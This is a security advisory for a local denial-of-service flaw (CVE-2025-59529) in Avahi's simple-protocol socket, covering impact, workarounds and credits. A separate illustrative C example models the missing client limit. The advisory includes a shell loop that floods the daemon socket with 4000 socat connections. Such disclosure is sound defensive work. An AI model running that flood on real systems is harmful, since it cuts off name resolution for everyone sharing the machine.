https://github.com/avahi/avahi/security/advisories/GHSA-73wf-3xmj-x82q advises:

Summary
-------

The simple protocol server ignores the documented client limit and
accepts unlimited connections, allowing for easy local DoS.

Details
-------

Although CLIENTS_MAX is defined, server_work() unconditionally
accept()s and client_new() always appends the new client and
increments n_clients. There is no check against the limit.

When a client cannot be accepted because avahi-daemon has reached its
maximum number of sockets, it unconditionally logs an error for each
connection.

PoC
---

# Flood the UNIX simple-protocol socket with idle connections
for i in $(seq 1 4000); do
  socat - UNIX-CONNECT:/run/avahi-daemon/socket >/dev/null 2>&1 &
done
wait

Watch avahi-daemon’s memory/FD count grow until it becomes unresponsive or
crashes, such as an endless loop of:

accept(): Too many open files
accept(): Too many open files
accept(): Too many open files

Impact
------

Unprivileged local users can exhaust daemon memory and file descriptors,
causing a denial of service system-wide for mDNS/DNS-SD.

Exhausting local file descriptors causes increased system load from
logging an error for each request.

Overloading prevents glibc calls using nss-mdns plugins to resolve
*.local. names and link-local addresses.

Workarounds
-----------

Simple clients are offered for nss-mdns package functionality. It is
not possible to disable the unix socket /run/avahi-daemon/socket, but
resolution requests received via DBus are not affected directly. The
tools avahi-resolve, avahi-resolve-address and avahi-resolve-host-name
are not affected; they use the DBus interface.

It is possible to change the permissions of the unix socket after
avahi-daemon is started, but avahi-daemon does not provide any
configuration for it. Additional access restrictions like SELinux can
also prevent unwanted tools from accessing the socket and keep
resolution working for trusted users.

Fixes
-----

    Candidate only: https://github.com/avahi/avahi/pull/808

Credits
-------

We would like to thank Joshua Rogers using the ZeroPath tool for
discovering and reporting the issue responsibly.

    Published article about it: Avahi Simple Protocol Server DoS (CVE-2025-59529)
    https://zeropath.com/blog/avahi-simple-protocol-server-dos-cve-2025-59529

Severity: Moderate, 5.5 / 10
          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVE ID: CVE-2025-59529
Weaknesses: CWE-400


--
        -Alan Coopersmith-                 [email protected]
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris
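
The missing limit check described under Details, modelled as an added example: this is not Avahi source and not the candidate fix in the pull request. The Server/Client structs, client_admit(), server_clear(), demo_flood() and the CLIENTS_MAX value of 4 are assumptions for illustration. It also logs once per burst of rejections instead of once per connection.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
#define CLIENTS_MAX 4 /* demo value (assumption); the advisory does not state Avahi's */

typedef struct Client { int fd; struct Client *next; } Client;
typedef struct Server { Client *clients; unsigned n_clients, n_rejected; } Server;

/* Takes ownership of an accepted fd: 0 = admitted, -1 = rejected and closed. */
int client_admit(Server *s, int fd) {
    Client *c = s->n_clients < CLIENTS_MAX ? malloc(sizeof *c) : NULL;
    if (!c) {                         /* at the cap, or out of memory */
        close(fd);                    /* never keep an fd that will not be served */
        if (s->n_rejected++ == 0)     /* one log line per burst, not per connection */
            fprintf(stderr, "client limit (%d) reached, rejecting\n", CLIENTS_MAX);
        return -1;
    }
    c->fd = fd;
    c->next = s->clients;
    s->clients = c;
    s->n_clients++;
    s->n_rejected = 0;                /* next burst of rejections logs again */
    return 0;
}

/* Drop every client, as a daemon would on disconnect or shutdown. */
void server_clear(Server *s) {
    for (Client *c; (c = s->clients); s->n_clients--) {
        s->clients = c->next;
        close(c->fd);
        free(c);
    }
}

/* Constructed driver: offer `attempts` connected sockets, return how many are held. */
unsigned demo_flood(Server *s, unsigned attempts) {
    int sv[2];
    while (attempts-- && socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == 0) {
        close(sv[1]);                 /* peer end is not needed for the demo */
        client_admit(s, sv[0]);
    }
    return s->n_clients;
}

int main(void) {
    Server s = {0};
    printf("held %u of 100 offered connections\n", demo_flood(&s, 100));
    server_clear(&s);
    return 0;
}
```

With the check in place the daemon's descriptor and memory use is bounded by CLIENTS_MAX however many connections are offered, and the rejected peer sees an immediate close.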
